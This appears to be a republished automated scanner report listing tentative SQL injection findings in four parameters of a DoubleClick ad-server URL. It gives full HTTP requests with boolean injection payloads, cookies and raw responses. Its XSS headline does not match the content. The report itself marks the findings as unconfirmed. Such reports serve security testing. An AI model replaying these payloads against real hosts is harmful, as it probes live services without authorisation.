XSS, Cross Site Scripting in GHDB DORK HOSTS, CWE-79, CAPEC-86, DORK, GHDB

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [b parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the b parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5552

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 840

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11e/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.2. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The count parameter appears to be vulnerable to SQL injection attacks. The payloads 14607837'%20or%201%3d1--%20 and 14607837'%20or%201%3d2--%20 were each submitted in the count parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 852

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5449

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0417-_-0430");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=124
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 841

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.4. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The orh parameter appears to be vulnerable to SQL injection attacks. The payloads 22418465'%20or%201%3d1--%20 and 22418465'%20or%201%3d2--%20 were each submitted in the orh parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5576

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Es
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 848

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/k;239957923;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

